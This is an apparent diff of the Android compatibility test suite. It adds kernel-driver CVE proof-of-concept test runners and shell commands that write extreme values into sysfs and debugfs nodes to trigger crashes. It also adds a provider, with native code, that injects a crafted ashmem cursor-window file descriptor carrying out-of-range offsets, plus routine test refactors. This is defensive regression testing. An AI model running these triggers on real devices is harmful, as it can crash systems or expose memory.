+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.CollectingOutputReceiver;
+import com.android.tradefed.device.DeviceNotAvailableException;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceTestCase;
+
+import android.platform.test.annotations.RootPermissionTest;
+import android.platform.test.annotations.SecurityTest;
+
+import java.io.BufferedOutputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.util.Scanner;
+
+@SecurityTest
+public class Poc16_10 extends SecurityTestCase {
+
+ /**
+ * b/30904789
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6730() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6730", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906023
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6731() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6731", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906599
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6732() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6732", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906694
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6733() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6733", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30907120
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6734() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6734", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30907701
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6735() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6735", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30953284
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6736() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6736", getDevice(), 60);
+ }
+ }
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_12.java b/hostsidetests/security/src/android/security/cts/Poc16_12.java
new file mode 100644
index 0000000..a6160d5
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc16_12.java
@@ -0,0 +1,258 @@
+/**
+0;256;0c * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.CollectingOutputReceiver;
+import com.android.tradefed.device.DeviceNotAvailableException;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceTestCase;
+
+import android.platform.test.annotations.RootPermissionTest;
+import android.platform.test.annotations.SecurityTest;
+
+import java.io.BufferedOutputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.util.Scanner;
+
+@SecurityTest
+public class Poc16_12 extends SecurityTestCase {
+
+ //Criticals
+ /**
+ * b/31606947
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8424() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8424", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31797770
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8425() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
+ AdbUtils.runPoc("CVE-2016-8425", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31799206
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8426() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-gpu")) {
+ AdbUtils.runPoc("CVE-2016-8426", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31799885
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8427() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-gpu") ||
+ containsDriver(getDevice(), "/dev/nvhost-dbg-gpu")) {
+ AdbUtils.runPoc("CVE-2016-8427", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31993456
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8428() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8428", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32160775
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8429() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8429", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32225180
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8430() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
+ AdbUtils.runPoc("CVE-2016-8430", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32402179
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8431() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8431", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32447738
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8432() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8432", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32125137
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8434() throws Exception {
+ if(containsDriver(getDevice(), "/dev/kgsl-3d0")) {
+ AdbUtils.runPoc("CVE-2016-8434", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32700935
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8435() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8435", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31568617
+ */
+ @SecurityTest
+ public void testPocCVE_2016_9120() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/ion")) {
+ AdbUtils.runPoc("CVE-2016-9120", getDevice(), 60);
+ }
+ }
+
+ //Highs
+ /**
+ * b/31225246
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8412() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/v4l-subdev7")) {
+ AdbUtils.runPoc("CVE-2016-8412", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31243641
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8444() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/v4l-subdev17")) {
+ AdbUtils.runPoc("CVE-2016-8444", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31791148
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8448() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/graphics/fb0")) {
+ AdbUtils.runPoc("CVE-2016-8448", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31798848
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8449() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/tegra_avpchannel")) {
+ AdbUtils.runPoc("CVE-2016-8449", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31668540
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8460() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ String result = AdbUtils.runPoc("CVE-2016-8460", getDevice(), 60);
+ assertTrue(!result.equals("Vulnerable"));
+ }
+ }
+
+ /**
+ * b/32402548
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0403() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2017-0403", getDevice(), 60);
+ }
+
+ /**
+ * b/32510733
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0404() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/proc/asound/version")) {
+ AdbUtils.runPoc("CVE-2017-0404", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32178033
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8451() throws Exception {
+ enableAdbRoot(getDevice());
+ String command =
+ "echo AAAAAAAAA > /sys/devices/f9924000.i2c/i2c-2/2-0070/power_control";
+ AdbUtils.runCommandLine(command, getDevice());
+ }
+
+ /**
+ * b/32659848
+ */
+ @SecurityTest
+ public void testPoc32659848() throws Exception {
+ String command =
+ "echo 18014398509481980 > /sys/kernel/debug/tracing/buffer_size_kb";
+ AdbUtils.runCommandLine(command, getDevice());
+ }
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_01.java b/hostsidetests/security/src/android/security/cts/Poc17_01.java
new file mode 100644
index 0000000..f8ed22a
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc17_01.java
@@ -0,0 +1,44 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc17_01 extends SecurityTestCase {
+
+ /**
+ * b/31799863
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8482() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8482", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32636619
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0429() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-as-gpu")) {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2017-0429", getDevice(), 60);
+ }
+ }
+ }
diff --git a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
index b6599c1..5c84850 100644
--- a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
+++ b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
@@ -64,6 +64,17 @@
}
/**
+ * Check if a driver is present on a machine
+ */
+ public boolean containsDriver(ITestDevice mDevice, String driver) throws Exception {
+ String result = mDevice.executeShellCommand("ls -Zl " + driver);
+ if(result.contains("No such file or directory")) {
+ return false;
+ }
+ return true;
+ }
+
+ /**
* Makes sure the phone is online, and the ensure the current boottime is within 2 seconds
* (due to rounding) of the previous boottime to check if The phone has crashed.
*/
diff --git a/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java b/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
index ccdba15..8fc3264 100644
--- a/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
+++ b/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
@@ -209,16 +209,8 @@
mDevice.executeShellCommand(AM_STACK_LIST, outputReceiver);
final String output = outputReceiver.getOutput();
for (String line : output.split("\\n")) {
- final String truncatedLine;
- // Only look for the activity name before the "topActivity" string.
- final int pos = line.indexOf("topActivity");
- if (pos > 0) {
- truncatedLine = line.substring(0, pos);
- } else {
- truncatedLine = line;
- }
- if (truncatedLine.contains(name)) {
- return truncatedLine;
+ if (line.contains(name)) {
+ return line;
}
}
return "";
diff --git a/tests/tests/content/Android.mk b/tests/tests/content/Android.mk
index d901926..98d067a 100644
--- a/tests/tests/content/Android.mk
+++ b/tests/tests/content/Android.mk
@@ -21,6 +21,8 @@
# and when built explicitly put it in the data partition
LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
+LOCAL_JNI_SHARED_LIBRARIES := libnativecursorwindow_jni libnativehelper_compat_libc++
+
LOCAL_JAVA_LIBRARIES := android.test.runner
LOCAL_STATIC_JAVA_LIBRARIES := android-support-v4 \
@@ -46,3 +48,5 @@
LOCAL_COMPATIBILITY_SUITE := cts
include $(BUILD_CTS_PACKAGE)
+
+include $(call all-makefiles-under,$(LOCAL_PATH))
diff --git a/tests/tests/content/AndroidManifest.xml b/tests/tests/content/AndroidManifest.xml
index d4f203e..040eafa 100644
--- a/tests/tests/content/AndroidManifest.xml
+++ b/tests/tests/content/AndroidManifest.xml
@@ -219,6 +219,13 @@
</intent-filter>
</activity>
+ <provider
+ android:name="android.content.cts.CursorWindowContentProvider"
+ android:authorities="cursorwindow.provider"
+ android:exported="true"
+ android:process=":providerProcess">
+ </provider>
+
</application>
<instrumentation android:name="android.support.test.runner.AndroidJUnitRunner"
diff --git a/tests/tests/content/jni/Android.mk b/tests/tests/content/jni/Android.mk
new file mode 100644
index 0000000..4737b35
--- /dev/null
+++ b/tests/tests/content/jni/Android.mk
@@ -0,0 +1,30 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH:= $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := libnativecursorwindow_jni
+
+# Don't include this package in any configuration by default.
+LOCAL_MODULE_TAGS := optional
+
+LOCAL_SRC_FILES := NativeCursorWindow.c
+
+LOCAL_C_INCLUDES := $(JNI_H_INCLUDE)
+
+LOCAL_SHARED_LIBRARIES := libnativehelper_compat_libc++ liblog
+LOCAL_CXX_STL := libc++_static
+include $(BUILD_SHARED_LIBRARY)
diff --git a/tests/tests/content/jni/NativeCursorWindow.c b/tests/tests/content/jni/NativeCursorWindow.c
new file mode 100644
index 0000000..a2fb92a
--- /dev/null
+++ b/tests/tests/content/jni/NativeCursorWindow.c
@@ -0,0 +1,99 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define LOG_TAG "NativeCursorWindow"
+
+#include <jni.h>
+#include <fcntl.h>
+#include <sys/mman.h>
+#include <linux/ashmem.h>
+#include <utils/Log.h>
+
+struct Header {
+ // Offset of the lowest unused byte in the window.
+ uint32_t freeOffset;
+
+ // Offset of the first row slot chunk.
+ uint32_t firstChunkOffset;
+
+ uint32_t numRows;
+ uint32_t numColumns;
+};
+
+struct RowSlot {
+ uint32_t offset;
+};
+
+#define ROW_SLOT_CHUNK_NUM_ROWS 100
+
+struct RowSlotChunk {
+ struct RowSlot slots[ROW_SLOT_CHUNK_NUM_ROWS];
+ uint32_t nextChunkOffset;
+};
+
+/* Field types. */
+enum {
+ FIELD_TYPE_NULL = 0,
+ FIELD_TYPE_INTEGER = 1,
+ FIELD_TYPE_FLOAT = 2,
+ FIELD_TYPE_STRING = 3,
+ FIELD_TYPE_BLOB = 4,
+};
+
+/* Opaque type that describes a field slot. */
+struct FieldSlot {
+ int32_t type;
+ union {
+ double d;
+ int64_t l;
+ struct {
+ uint32_t offset;
+ uint32_t size;
+ } buffer;
+ } data;
+} __attribute((packed));
+
+JNIEXPORT jint JNICALL
+Java_android_content_cts_CursorWindowContentProvider_makeNativeCursorWindowFd(JNIEnv *env, jclass clazz,
+jint offset, jint size, jboolean isBlob) {
+ int fd = open("/dev/ashmem", O_RDWR);
+ ioctl(fd, ASHMEM_SET_NAME, "Fake CursorWindow");
+
+ ioctl(fd, ASHMEM_SET_SIZE, 1024);
+
+ void *data = mmap(NULL, 1024, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
+
+ struct Header *header = (struct Header *) data;
+ unsigned rowSlotChunkOffset = sizeof(struct Header);
+ struct RowSlotChunk *rowSlotChunk = (struct RowSlotChunk *)(data + rowSlotChunkOffset);
+ unsigned fieldSlotOffset = rowSlotChunkOffset + sizeof(struct RowSlotChunk);
+ struct FieldSlot *fieldSlot = (struct FieldSlot *) (data + fieldSlotOffset);
+
+ header->numRows = 1;
+ header->numColumns = 1;
+ header->firstChunkOffset = rowSlotChunkOffset;
+
+ rowSlotChunk->slots[0].offset = fieldSlotOffset;
+
+ fieldSlot->type = isBlob ? FIELD_TYPE_BLOB : FIELD_TYPE_STRING;
+ fieldSlot->data.buffer.offset = offset;
+ fieldSlot->data.buffer.size = size;
+
+ munmap(data, 1024);
+
+ return fd;
+
+}
diff --git a/tests/tests/content/src/android/content/cts/ContentProviderCursorWindowTest.java b/tests/tests/content/src/android/content/cts/ContentProviderCursorWindowTest.java
new file mode 100644
index 0000000..004b193
--- /dev/null
+++ b/tests/tests/content/src/android/content/cts/ContentProviderCursorWindowTest.java
@@ -0,0 +1,54 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License
+ */
+
+package android.content.cts;
+
+import android.database.Cursor;
+import android.database.sqlite.SQLiteException;
+import android.net.Uri;
+import android.test.AndroidTestCase;
+import android.util.Log;
+
+import java.io.IOException;
+
+/**
+ * Test {@link CursorWindowContentProvider} .
+ */
+public class ContentProviderCursorWindowTest extends AndroidTestCase {
+ private static final String TAG = "ContentProviderCursorWindowTest";
+
+ public void testQuery() throws IOException {
+ Cursor cursor = getContext().getContentResolver().query(
+ Uri.parse("content://cursorwindow.provider/hello"),
+ null, null, null, null
+ );
+ try {
+ cursor.moveToFirst();
+
+ int type = cursor.getType(0);
+ if (type != Cursor.FIELD_TYPE_BLOB) {
+ fail("Unexpected type " + type);
+ }
+ byte[] blob = cursor.getBlob(0);
+ Log.i(TAG, "Blob length " + blob.length);
+ fail("getBlob should fail due to invalid offset used in the field slot");
+ } catch (SQLiteException expected) {
+ Log.i(TAG, "Expected exception: " + expected);
+ } finally {
+ cursor.close();
+ }
+ }
+}
diff --git a/tests/tests/content/src/android/content/cts/CursorWindowContentProvider.java b/tests/tests/content/src/android/content/cts/CursorWindowContentProvider.java
new file mode 100644
index 0000000..4266f35
--- /dev/null
+++ b/tests/tests/content/src/android/content/cts/CursorWindowContentProvider.java
@@ -0,0 +1,130 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License
+ */
+
+package android.content.cts;
+
+import android.annotation.NonNull;
+import android.annotation.Nullable;
+import android.content.ContentProvider;
+import android.content.ContentValues;
+import android.database.AbstractWindowedCursor;
+import android.database.Cursor;
+import android.database.CursorWindow;
+import android.net.Uri;
+import android.os.Parcel;
+import android.os.ParcelFileDescriptor;
+import android.util.Log;
+
+/**
+ * Content provider that uses a custom {@link CursorWindow} to inject file descriptor
+ * pointing to another ashmem region having window slots with references outside of allowed ranges.
+ *
+ * <p>Used in {@link ContentProviderCursorWindowTest}
+ */
+public class CursorWindowContentProvider extends ContentProvider {
+ private static final String TAG = "CursorWindowContentProvider";
+ static {
+ System.loadLibrary("nativecursorwindow_jni");
+ }
+
+ @Override
+ public Cursor query(Uri uri, String[] projection, String selection,
+ String[] selectionArgs, String sortOrder) {
+ AbstractWindowedCursor cursor = new AbstractWindowedCursor() {
+ @Override
+ public int getCount() {
+ return 1;
+ }
+
+ @Override
+ public String[] getColumnNames() {
+ return new String[] {"a"};
+ }
+ };
+ cursor.setWindow(new InjectingCursorWindow("TmpWindow"));
+ return cursor;
+ }
+
+ class InjectingCursorWindow extends CursorWindow {
+ InjectingCursorWindow(String name) {
+ super(name);
+ }
+
+ @Override
+ public void writeToParcel(Parcel dest, int flags) {
+ Parcel tmp = Parcel.obtain();
+
+ super.writeToParcel(tmp, flags);
+ tmp.setDataPosition(0);
+ // Find location of file descriptor
+ int fdPos = -1;
+ while (tmp.dataAvail() > 0) {
+ fdPos = tmp.dataPosition();
+ int frameworkFdMarker = tmp.readInt();
+ if (frameworkFdMarker == 0x66642a85 /* BINDER_TYPE_FD */) {
+ break;
+ }
+ }
+ if (fdPos == -1) {
+ tmp.recycle();
+ throw new IllegalStateException("File descriptor not found in the output of "
+ + "CursorWindow.writeToParcel");
+ }
+ // Write reply with replaced file descriptor
+ ParcelFileDescriptor evilFd = ParcelFileDescriptor
+ .adoptFd(makeNativeCursorWindowFd(1000, 1000, true));
+ dest.appendFrom(tmp, 0, fdPos);
+ dest.writeFileDescriptor(evilFd.getFileDescriptor());
+ tmp.setDataPosition(dest.dataPosition());
+ dest.appendFrom(tmp, dest.dataPosition(), tmp.dataAvail());
+ tmp.recycle();
+ }
+ }
+
+ private native static int makeNativeCursorWindowFd(int offset, int size, boolean isBlob);
+
+ // Stubs
+ @Override
+ public boolean onCreate() {
+ return true;
+ }
+
+ @Override
+ public int delete(Uri uri, String selection, String[] selectionArgs) {
+ Log.e(TAG, "delete() not implemented");
+ return 0;
+ }
+
+ @Override
+ public String getType(Uri uri) {
+ Log.e(TAG, "getType() not implemented");
+ return "";
+ }
+
+ @Override
+ public Uri insert(@NonNull Uri uri, @Nullable ContentValues values) {
+ Log.e(TAG, "insert() not implemented");
+ return null;
+ }
+
+ @Override
+ public int update(Uri uri, ContentValues values, String selection,
+ String[] selectionArgs) {
+ Log.e(TAG, "update() not implemented");
+ return 0;
+ }
+
+}
diff --git a/tests/tests/location/src/android/location/cts/LocationManagerTest.java b/tests/tests/location/src/android/location/cts/LocationManagerTest.java
index 7fcc2aa..3af213e 100644
--- a/tests/tests/location/src/android/location/cts/LocationManagerTest.java
+++ b/tests/tests/location/src/android/location/cts/LocationManagerTest.java
@@ -993,6 +993,27 @@
}
}
+ /**
+ * Test case for bug 33091107, where a malicious app used to be able to fool a real provider
+ * into providing a mock location that isn't marked as being mock.
+ */
+ public void testLocationShouldStillBeMarkedMockWhenProvidersDoNotMatch()
+ throws InterruptedException {
+ double latitude = 20;
+ double longitude = 40;
+
+ List<String> providers = mManager.getAllProviders();
+ if (providers.isEmpty()) {
+ // Device doesn't have any providers. Can't perform this test, and no need to do so:
+ // no providers that malicious app could fool
+ return;
+ }
+ String realProviderToFool = providers.get(0);
+
+ // Register for location updates, then set a mock location and ensure it is marked "mock"
+ updateLocationAndWait(TEST_MOCK_PROVIDER_NAME, realProviderToFool, latitude, longitude);
+ }
+
@UiThreadTest
public void testGpsStatusListener() {
MockGpsStatusListener listener = new MockGpsStatusListener();
@@ -1152,22 +1173,38 @@
private void updateLocationAndWait(String providerName, double latitude, double longitude)
throws InterruptedException {
+ updateLocationAndWait(providerName, providerName, latitude, longitude);
+ }
+
+ /**
+ * Like {@link #updateLocationAndWait(String, double, double)}, but allows inconsistent providers
+ * to be used in the calls to {@link Location#Location(String)} and {@link
+ * LocationManager#setTestProviderLocation(String, Location)}
+ *
+ * @param testProviderName used in {@link LocationManager#setTestProviderLocation(String,
+ * Location)}
+ * @param locationProviderName used in {@link Location#Location(String)}
+ */
+ private void updateLocationAndWait(String testProviderName, String locationProviderName,
+ double latitude, double longitude) throws InterruptedException {
+
// Register a listener for the location we are about to set.
MockLocationListener listener = new MockLocationListener();
HandlerThread handlerThread = new HandlerThread("updateLocationAndWait");
handlerThread.start();
- mManager.requestLocationUpdates(providerName, 0, 0, listener, handlerThread.getLooper());
+ mManager.requestLocationUpdates(locationProviderName, 0, 0, listener,
+ handlerThread.getLooper());
// Set the location.
- updateLocation(providerName, latitude, longitude);
+ updateLocation(testProviderName, locationProviderName, latitude, longitude);
// Make sure we received the location, and it is the right one.
- assertTrue(listener.hasCalledOnLocationChanged(TEST_TIME_OUT));
+ assertTrue("Listener not called", listener.hasCalledOnLocationChanged(TEST_TIME_OUT));
Location location = listener.getLocation();
- assertEquals(providerName, location.getProvider());
- assertEquals(latitude, location.getLatitude());
- assertEquals(longitude, location.getLongitude());
- assertEquals(true, location.isFromMockProvider());
+ assertEquals("Bad provider name", locationProviderName, location.getProvider());
+ assertEquals("Bad latitude", latitude, location.getLatitude());
+ assertEquals("Bad longitude", longitude, location.getLongitude());
+ assertTrue("Bad isMock", location.isFromMockProvider());
// Remove the listener.
mManager.removeUpdates(listener);
@@ -1220,13 +1257,23 @@
private void updateLocation(final String providerName, final double latitude,
final double longitude) {
- Location location = new Location(providerName);
+ updateLocation(providerName, providerName, latitude, longitude);
+ }
+
+ /**
+ * Like {@link #updateLocation(String, double, double)}, but allows inconsistent providers to be
+ * used in the calls to {@link Location#Location(String)} and
+ * {@link LocationManager#setTestProviderLocation(String, Location)}.
+ */
+ private void updateLocation(String testProviderName, String locationProviderName,
+ double latitude, double longitude) {
+ Location location = new Location(locationProviderName);
location.setLatitude(latitude);
location.setLongitude(longitude);
location.setAccuracy(1.0f);
- location.setTime(java.lang.System.currentTimeMillis());
+ location.setTime(System.currentTimeMillis());
location.setElapsedRealtimeNanos(SystemClock.elapsedRealtimeNanos());
- mManager.setTestProviderLocation(providerName, location);
+ mManager.setTestProviderLocation(testProviderName, location);
}
private void updateLocation(final double latitude, final double longitude) {
diff --git a/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java b/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java
index 9b1dc81..7b74ba7 100644
--- a/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java
+++ b/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java
@@ -19,22 +19,11 @@
import android.annotation.TargetApi;
import android.content.Context;
-import android.cts.util.MediaUtils;
import android.graphics.Bitmap;
-import android.media.MediaFormat;
-import android.support.test.runner.AndroidJUnit4;
import android.util.Log;
import android.view.View;
-import org.junit.After;
-import org.junit.Before;
-import org.junit.Rule;
-import org.junit.rules.Timeout;
-import org.junit.runner.RunWith;
-import org.junit.Test;
-
@TargetApi(24)
-@RunWith(AndroidJUnit4.class)
public class DecodeAccuracyTest extends DecodeAccuracyTestBase {
private static final String TAG = DecodeAccuracyTest.class.getSimpleName();
@@ -43,17 +32,12 @@
private static final String H264_CROPPED_VIDEO_FILE_NAME = "520x360h264decodertest.mp4";
private static final int ALLOWED_GREATEST_PIXEL_DIFFERENCE = 90;
private static final int OFFSET = 10;
- private static final int PER_TEST_TIMEOUT_S = 30;
private View videoView;
private VideoViewFactory videoViewFactory;
- @Rule
- public Timeout globalTimeout = Timeout.seconds(PER_TEST_TIMEOUT_S);
-
- @After
@Override
- public void tearDown() throws Exception {
+ protected void tearDown() throws Exception {
if (videoView != null) {
getHelper().cleanUpView(videoView);
}
@@ -64,42 +48,36 @@
}
/* <------------- Tests Using H264 -------------> */
- @Test
public void testH264GLViewVideoDecode() throws Exception {
runH264DecodeAccuracyTest(
new GLSurfaceViewFactory(),
new VideoFormat(H264_VIDEO_FILE_NAME));
}
- @Test
public void testH264GLViewLargerHeightVideoDecode() throws Exception {
runH264DecodeAccuracyTest(
new GLSurfaceViewFactory(),
getLargerHeightVideoFormat(new VideoFormat(H264_VIDEO_FILE_NAME)));
}
- @Test
public void testH264GLViewLargerWidthVideoDecode() throws Exception {
runH264DecodeAccuracyTest(
new GLSurfaceViewFactory(),
getLargerWidthVideoFormat(new VideoFormat(H264_VIDEO_FILE_NAME)));
}
- @Test
public void testH264SurfaceViewVideoDecode() throws Exception {
runH264DecodeAccuracyTest(
new SurfaceViewFactory(),
